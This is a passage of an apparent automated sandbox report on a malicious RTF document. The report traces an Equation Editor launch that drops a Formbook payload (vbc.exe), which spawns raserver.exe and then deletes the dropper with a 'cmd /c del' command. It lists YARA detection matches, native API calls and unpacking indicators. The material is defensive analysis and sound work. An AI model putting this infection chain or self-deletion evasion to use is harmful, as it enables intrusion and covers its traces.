            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0109A2A9
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0045655F
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00455918
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00455928
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00455B78
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0109A035
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041DB58
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041E4E9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402D89
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041E59C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D5A3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041EDB1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041DE45
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E5C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E60
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0109A2A9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4E0C6
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7D005
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ACD06D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A53040
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6905A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4E2E9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF1238
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF63BF
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4F3CF
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A763DB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A52305
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A9A37B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A57353
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A85485
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A61489
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD443E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A8D47D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD05E3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6C5F0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5351F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A96540
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A54680
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5E6C1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF2622
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A9A634
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5C7BC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD579A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A857C3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AEF8EE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ACF8C4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7286D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5C85C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A529B2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF098E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A669FE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD394B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD5955
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00B03A83
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AFCBA4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD6BCB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4FBD7
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ADDBDA
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A77B00
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AEFDDD
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A80D3B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5CD5B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A82E2F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6EE4C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AECFB1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AC2FDC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A60F3F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7DF7C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0109A035
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECE0C6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F4D06D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED3040
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE905A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EFD005
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECF3CF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF63DB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F763BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F1A37B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED7353
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED2305
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECE2E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F71238
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F505E3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EEC5F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F16540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED351F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE1489
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F05485
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F0D47D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5443E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F057C3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDC7BC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5579A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDE6C1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED4680
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F1A634
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F72622
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE69FE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED29B2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F7098E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F55955
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5394B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6F8EE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F4F8C4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF286D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDC85C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5DBDA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECFBD7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F7CBA4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF7B00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F83A83
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6FDDD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDCD5B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F00D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F42FDC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6CFB1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EFDF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE0F3F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EEEE4C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F02E2F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DE4E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DE59C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD5A3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DDB58
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2D89
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DEDAD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DDE45
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C9E5C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C9E60
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01ECDF5C appears 121 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F3F970 appears 84 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01ECE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F1373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F13F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 123 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 245 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 84 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4E2A8 appears 41 times
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A360 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A410 NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A490 NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A40A NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A53C NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A400C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A410D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40060 NtQuerySection,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A401D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41148 NtOpenThread,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A407AC NtCreateMutant,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41930 NtSetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F938 NtWriteFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAB8 NtQueryValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FA20 NtQueryInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FA50 NtEnumerateValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FBE8 NtQueryVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FB50 NtCreateKey,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC30 NtOpenProcess,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40C40 NtGetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC48 NtSetInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41D80 NtSuspendThread,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FD5C NtEnumerateKey,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FE24 NtWriteVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FFFC NtCreateProcessEx,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA360 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA410 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA490 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA540 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA40A NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA53C NtAllocateVirtualMemory,
            Source: vbc[1].exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: vbc.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and write
            Source: vbc[1].exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3nkW4MtwSD.rtfVirustotal: Detection: 56%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$kW4MtwSD.rtfJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@10/9@3/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: vbc[1].exe.1.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: vbc.exe.1.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.10.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
